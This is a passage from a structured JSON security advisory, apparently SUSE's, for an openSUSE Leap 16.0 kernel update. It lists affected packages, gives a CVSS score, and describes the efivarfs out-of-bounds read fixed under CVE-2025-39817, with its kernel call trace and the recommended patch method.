"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-39814"
},
{
"cve": "CVE-2025-39817",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-39817"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nefivarfs: Fix slab-out-of-bounds in efivarfs_d_compare\n\nObserved on kernel 6.6 (present on master as well):\n\n BUG: KASAN: slab-out-of-bounds in memcmp+0x98/0xd0\n Call trace:\n kasan_check_range+0xe8/0x190\n __asan_loadN+0x1c/0x28\n memcmp+0x98/0xd0\n efivarfs_d_compare+0x68/0xd8\n __d_lookup_rcu_op_compare+0x178/0x218\n __d_lookup_rcu+0x1f8/0x228\n d_alloc_parallel+0x150/0x648\n lookup_open.isra.0+0x5f0/0x8d0\n open_last_lookups+0x264/0x828\n path_openat+0x130/0x3f8\n do_filp_open+0x114/0x248\n do_sys_openat2+0x340/0x3c0\n __arm64_sys_openat+0x120/0x1a0\n\nIf dentry-\u003ed_name.len \u003c EFI_VARIABLE_GUID_LEN , \u0027guid\u0027 can become\nnegative, leadings to oob. The issue can be triggered by parallel\nlookups using invalid filename:\n\n T1\t\t\tT2\n lookup_open\n -\u003elookup\n simple_lookup\n d_add\n // invalid dentry is added to hash list\n\n\t\t\tlookup_open\n\t\t\t d_alloc_parallel\n\t\t\t __d_lookup_rcu\n\t\t\t __d_lookup_rcu_op_compare\n\t\t\t hlist_bl_for_each_entry_rcu\n\t\t\t // invalid dentry can be retrieved\n\t\t\t -\u003ed_compare\n\t\t\t efivarfs_d_compare\n\t\t\t // oob\n\nFix it by checking \u0027guid\u0027 before cmp.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-39817",
"url": "https://www.suse.com/security/cve/CVE-2025-39817"
},
{
"category": "external",
"summary": "SUSE Bug 1249998 for CVE-2025-39817",
"url": "https://bugzilla.suse.com/1249998"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
